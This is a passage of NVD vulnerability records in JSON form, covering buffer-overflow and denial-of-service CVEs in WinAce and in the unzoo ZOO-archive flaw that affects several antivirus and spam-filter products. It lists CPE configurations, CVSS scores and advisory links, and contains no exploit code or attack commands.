      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://securitytracker.com/id?1014863"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://securitytracker.com/id?1015852"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://securitytracker.com/id?1016011"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://securitytracker.com/id?1016012"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://securitytracker.com/id?1016065"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://securitytracker.com/id?1016066"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://securitytracker.com/id?1016088"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://securitytracker.com/id?1016114"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://securitytracker.com/id?1016115"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://securitytracker.com/id?1016177"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://securitytracker.com/id?1016257"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://securitytracker.com/id?1016512"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.osvdb.org/25129"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/432357/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/432579/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/433258/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/433352/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/433693/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/434011/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/434234/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/434279/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/436639/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/440303/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/14759"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/19884"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.vupen.com/english/advisories/2006/1565"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.vupen.com/english/advisories/2006/1577"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.vupen.com/english/advisories/2006/1611"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.vupen.com/english/advisories/2006/1681"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.vupen.com/english/advisories/2006/1694"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.vupen.com/english/advisories/2006/1725"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.vupen.com/english/advisories/2006/1775"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.vupen.com/english/advisories/2006/1797"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.vupen.com/english/advisories/2006/1835"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.vupen.com/english/advisories/2006/1836"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.vupen.com/english/advisories/2006/2047"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.vupen.com/english/advisories/2006/2184"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.vupen.com/english/advisories/2006/2824"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.vupen.com/english/advisories/2006/3495"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26116"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26142"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26168"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26272"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26302"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26315"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26385"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26447"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26479"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26480"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26736"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26982"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/27763"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/28787"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-119"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2007-12-28 00:46
Modified
2024-11-21 00:40
Severity ?
Summary
Heap-based buffer overflow in WinAce 2.65 and earlier, and possibly other versions before 2.69, allows user-assisted remote attackers to execute arbitrary code via a long filename in a compressed UUE archive.
Impacted products
Vendor Product Version
winace winace *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:winace:winace:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "C36B6D02-34DC-47CA-836C-18429D7F7C08",
              "versionEndIncluding": "2.65",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Heap-based buffer overflow in WinAce 2.65 and earlier, and possibly other versions before 2.69, allows user-assisted remote attackers to execute arbitrary code via a long filename in a compressed UUE archive."
    },
    {
      "lang": "es",
      "value": "Desbordamiento de b\u00fafer basado en mont\u00edculo en WinAce 2.65 y versiones anteriores, y posiblemente otras versiones anteriores a 2.69, permite a atacantes remotos con la complicidad del usuario ejecutar c\u00f3digo de su elecci\u00f3n mediante un nombre de fichero largo en un archivo comprimido UUE."
    }
  ],
  "id": "CVE-2007-6563",
  "lastModified": "2024-11-21T00:40:27.133",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 10.0,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "COMPLETE",
          "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 10.0,
        "obtainAllPrivilege": true,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2007-12-28T00:46:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://jvn.jp/jp/JVN%2344736880/index.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://jvndb.jvn.jp/contents/ja/2007/JVNDB-2007-000822.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://osvdb.org/40267"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/28215"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.fourteenforty.jp/research/advisory.cgi?FFRRA-20071225"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "http://www.securityfocus.com/bid/27017"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.vupen.com/english/advisories/2007/4312"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/39268"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://jvn.jp/jp/JVN%2344736880/index.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://jvndb.jvn.jp/contents/ja/2007/JVNDB-2007-000822.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://osvdb.org/40267"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/28215"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.fourteenforty.jp/research/advisory.cgi?FFRRA-20071225"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://www.securityfocus.com/bid/27017"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.vupen.com/english/advisories/2007/4312"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/39268"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-119"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2007-05-09 01:19
Modified
2024-11-21 00:31
Severity ?
Summary
WinAce allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file.
Impacted products
Vendor Product Version
winace winace 2.5
winace winace 2.6.0.5
winace winace 2.60



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:winace:winace:2.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "9BC96B1C-CFD0-4752-896C-5EE0A43397DE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:winace:winace:2.6.0.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "65352B0F-D752-4814-92E9-CB0769E66EAB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:winace:winace:2.60:*:*:*:*:*:*:*",
              "matchCriteriaId": "B8B82379-9F04-41E6-BCFE-34E7507C610F",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "WinAce allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file."
    },
    {
      "lang": "es",
      "value": "WinAce permite a atacantes remotos provocar una denegaci\u00f3n de servicio (bucle infinito) mediante un archivo ZOO con una estructura de entrada de directorio (direntry structure) que apunta a un fichero anterior."
    }
  ],
  "id": "CVE-2007-2535",
  "lastModified": "2024-11-21T00:31:01.140",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 7.8,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2007-05-09T01:19:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://osvdb.org/41750"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://securityreason.com/securityalert/2680"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/467646/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.securityfocus.com/bid/23823"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34080"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://osvdb.org/41750"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://securityreason.com/securityalert/2680"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/467646/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.securityfocus.com/bid/23823"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34080"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2005-08-26 15:50
Modified
2024-11-21 00:00
Severity ?
Summary
Buffer overflow in WinAce 2.6.0.5, and possibly earlier versions, allows remote attackers to execute arbitrary code via a temporary (.tmp) file that contains an entry with a long file name.
Impacted products
Vendor Product Version
winace winace 2.6.0.5



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:winace:winace:2.6.0.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "65352B0F-D752-4814-92E9-CB0769E66EAB",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Buffer overflow in WinAce 2.6.0.5, and possibly earlier versions, allows remote attackers to execute arbitrary code via a temporary (.tmp) file that contains an entry with a long file name."
    }
  ],
  "id": "CVE-2005-2694",
  "lastModified": "2024-11-21T00:00:10.207",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": true,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2005-08-26T15:50:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://marc.info/?l=bugtraq\u0026m=112447630109392\u0026w=2"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/21941"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://marc.info/?l=bugtraq\u0026m=112447630109392\u0026w=2"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/21941"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2006-02-24 11:02
Modified
2024-11-21 00:07
Severity ?
Summary
Heap-based buffer overflow in WinACE 2.60 allows user-assisted attackers to execute arbitrary code via a large header block in an ARJ archive.
Impacted products
Vendor Product Version
winace winace 2.60



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:winace:winace:2.60:*:*:*:*:*:*:*",
              "matchCriteriaId": "B8B82379-9F04-41E6-BCFE-34E7507C610F",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Heap-based buffer overflow in WinACE 2.60 allows user-assisted attackers to execute arbitrary code via a large header block in an ARJ archive."
    }
  ],
  "id": "CVE-2006-0813",
  "lastModified": "2024-11-21T00:07:24.003",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "HIGH",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.1,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 4.9,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": true,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ]
  },
  "published": "2006-02-24T11:02:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/17251"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/secunia_research/2005-67/advisory/"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://securityreason.com/securityalert/479"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://securitytracker.com/id?1015672"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.osvdb.org/23383"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/425894/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/16786"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2006/0709"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/24872"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/17251"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/secunia_research/2005-67/advisory/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://securityreason.com/securityalert/479"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://securitytracker.com/id?1015672"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.osvdb.org/23383"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/425894/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/16786"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2006/0709"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/24872"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-119"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2007-05-09 01:19
Modified
2024-11-21 00:28
Severity ?
Summary
unzoo.c, as used in multiple products including AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file.
Impacted products
Vendor Product Version
amavis amavis *
avast avast_antivirus *
avast avast_antivirus 4.6.394
avast avast_antivirus 4.7.652
avast avast_antivirus 4.7.700
avast avast_antivirus_home 4.0
avast avast_antivirus_home 4.6
avast avast_antivirus_home 4.6.652
avast avast_antivirus_home 4.6.655
avast avast_antivirus_home 4.6.665
avast avast_antivirus_home 4.6.691
avast avast_antivirus_home 4.7.827
avast avast_antivirus_home 4.7.827
avast avast_antivirus_home 4.7.844
avast avast_antivirus_home 4.7.844
avast avast_antivirus_home 4.7.869
avast avast_antivirus_home 4.7.869
avast avast_antivirus_home 4.7.1043
avast avast_antivirus_home 4.7.1043
avast avast_antivirus_home 4.7.1098
avast avast_antivirus_home 4.7.1098
avast avast_antivirus_professional 4.0
avast avast_antivirus_professional 4.6
avast avast_antivirus_professional 4.6.603
avast avast_antivirus_professional 4.6.652
avast avast_antivirus_professional 4.6.665
avast avast_antivirus_professional 4.6.691
avast avast_antivirus_professional 4.7.827
avast avast_antivirus_professional 4.7.827
avast avast_antivirus_professional 4.7.844
avast avast_antivirus_professional 4.7.844
avast avast_antivirus_professional 4.7.869
avast avast_antivirus_professional 4.7.1043
avast avast_antivirus_professional 4.7.1043
avast avast_antivirus_professional 4.7.1098
avira antivir *
avira antivir 6.35.00.00
avira antivir 7.04.00.23
avira antivir_personal *
avira antivir_personal *
avira antivir_personal *
avira antivir_personal *
avira antivir_personal 7
avira antivir_personal 7
panda panda_antivirus 2007
panda panda_antivirus_and_firewall 2007
picozip picozip *
rahul_dhesi zoo *
unzoo unzoo 4.4
winace winace *
barracuda_networks barracuda_spam_firewall *
barracuda_networks barracuda_spam_firewall model_100
barracuda_networks barracuda_spam_firewall model_200
barracuda_networks barracuda_spam_firewall model_300
barracuda_networks barracuda_spam_firewall model_400
barracuda_networks barracuda_spam_firewall model_500
barracuda_networks barracuda_spam_firewall model_600
barracuda_networks barracuda_spam_firewall model_800
barracuda_networks barracuda_spam_firewall model_900



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:amavis:amavis:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "64AF6FAE-B025-4F70-9F52-C7C12C6F705D",
              "versionEndIncluding": "2.4.1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avast:avast_antivirus:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "6AC3BF13-2946-411E-93A5-0C3AF0508C60",
              "versionEndIncluding": "4.7.980",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avast:avast_antivirus:4.6.394:*:*:*:*:*:*:*",
              "matchCriteriaId": "8683D747-C092-4841-AABF-280D7EB771F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avast:avast_antivirus:4.7.652:*:*:*:*:*:*:*",
              "matchCriteriaId": "D393356E-0464-41B6-9D56-2DCFC6900244",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avast:avast_antivirus:4.7.700:*:*:*:*:*:*:*",
              "matchCriteriaId": "0ED7C89E-E28B-4BE9-952D-86A8D089B41D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avast:avast_antivirus_home:4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "1519A450-8F71-408A-81B8-AA6F337E7A25",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avast:avast_antivirus_home:4.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "48872452-2B26-44C4-A9FF-0D9D23AAC95A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avast:avast_antivirus_home:4.6.652:*:*:*:*:*:*:*",
              "matchCriteriaId": "275D7948-61FB-4415-A9EB-59EEF9757149",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avast:avast_antivirus_home:4.6.655:*:*:*:*:*:*:*",
              "matchCriteriaId": "5CCC4081-D877-4DE3-9342-59BCE7C41CE2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avast:avast_antivirus_home:4.6.665:*:*:*:*:*:*:*",
              "matchCriteriaId": "B189DFCB-2307-43B4-8102-BA725CEE0711",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avast:avast_antivirus_home:4.6.691:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C733E69-33B3-465B-B146-A68C26373E00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avast:avast_antivirus_home:4.7.827:*:*:*:*:*:*:*",
              "matchCriteriaId": "2EF16A3D-BC29-4426-BDF5-F1C6E85228B0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avast:avast_antivirus_home:4.7.827:*:windows:*:*:*:*:*",
              "matchCriteriaId": "33A71A2C-36AC-4F36-9D94-AA824F4DE14C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avast:avast_antivirus_home:4.7.844:*:*:*:*:*:*:*",
              "matchCriteriaId": "E02983BB-F027-4967-A230-933299D2D061",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avast:avast_antivirus_home:4.7.844:*:windows:*:*:*:*:*",
              "matchCriteriaId": "62618C12-3EAC-4434-B2A8-D83612F1A05C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avast:avast_antivirus_home:4.7.869:*:*:*:*:*:*:*",
              "matchCriteriaId": "238FB2B1-41CF-46DB-8ED7-7F2B6609C27D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avast:avast_antivirus_home:4.7.869:*:windows:*:*:*:*:*",
              "matchCriteriaId": "B949535B-9771-4AC6-BBDB-8BB3A789A1FA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avast:avast_antivirus_home:4.7.1043:*:*:*:*:*:*:*",
              "matchCriteriaId": "97FEA351-FFF6-4452-9A2B-A7AAF4D7EE20",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avast:avast_antivirus_home:4.7.1043:*:windows:*:*:*:*:*",
              "matchCriteriaId": "DC6DA89A-BF71-4031-9B51-E5941FDE5E15",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avast:avast_antivirus_home:4.7.1098:*:*:*:*:*:*:*",
              "matchCriteriaId": "18837F1C-8ECD-4202-9489-08D63FB28CDB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avast:avast_antivirus_home:4.7.1098:*:windows:*:*:*:*:*",
              "matchCriteriaId": "DB201D49-EB74-4A5D-B641-86C4429E3EC0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avast:avast_antivirus_professional:4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "231DDF5E-5026-4844-8374-45F0926F8C4F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avast:avast_antivirus_professional:4.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "8822D55C-FEE7-41B5-A8D5-8D9F514CF815",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avast:avast_antivirus_professional:4.6.603:*:*:*:*:*:*:*",
              "matchCriteriaId": "B89C0CA4-00DE-4CAD-B554-36C46815A919",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avast:avast_antivirus_professional:4.6.652:*:*:*:*:*:*:*",
              "matchCriteriaId": "A618B922-80E7-4769-90BA-5FE231DA6B89",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avast:avast_antivirus_professional:4.6.665:*:*:*:*:*:*:*",
              "matchCriteriaId": "40F19B83-BAD9-4CDC-95C5-6D352F223AA9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avast:avast_antivirus_professional:4.6.691:*:*:*:*:*:*:*",
              "matchCriteriaId": "762B6C23-5ADD-4221-8146-DF9CE95637BB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avast:avast_antivirus_professional:4.7.827:*:*:*:*:*:*:*",
